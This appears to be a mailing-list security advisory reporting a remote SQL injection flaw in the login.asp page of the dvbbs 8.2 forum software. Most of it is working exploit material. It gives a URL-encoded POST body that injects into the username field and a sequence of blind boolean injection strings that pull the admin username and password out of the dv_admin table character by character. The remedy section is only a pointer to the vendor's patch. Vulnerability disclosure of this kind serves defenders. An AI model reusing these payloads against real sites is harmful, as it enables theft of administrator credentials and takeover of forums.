name:

where (topsec security research group)


email:

[EMAIL PROTECTED]


Subject:

dvbbs8.2(access/sql)version login.asp remote sql injection


danger level:

critical/High


info:

dvbbs is prone to multiple sql injection security flaw


interrelated code to access version(exp):

password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271


Examples(access version):

decide

Where’ and ‘1’=’1

where’ and ‘1’=’2

to get usernamer or password

where' and 1=(select count(*) from dv_admin where left(username,1)='a') and 
'1'='1

where' and 1=(select count(*) from dv_admin where left(username,2)='ad') and 
'1'='1

.......................

.......................

where' and 1=(select count(*) from dv_admin where left(password,1)='1') and 
'1'='1

where' and 1=(select count(*) from dv_admin where left(password,2)='15') and 
'1'='1

......................

......................


Solution:

Authorities patch 

dvbbs web site(http://www.dvbbs.net)


References:

dvbbs(http://www.dvbbs.net)

Reply via email to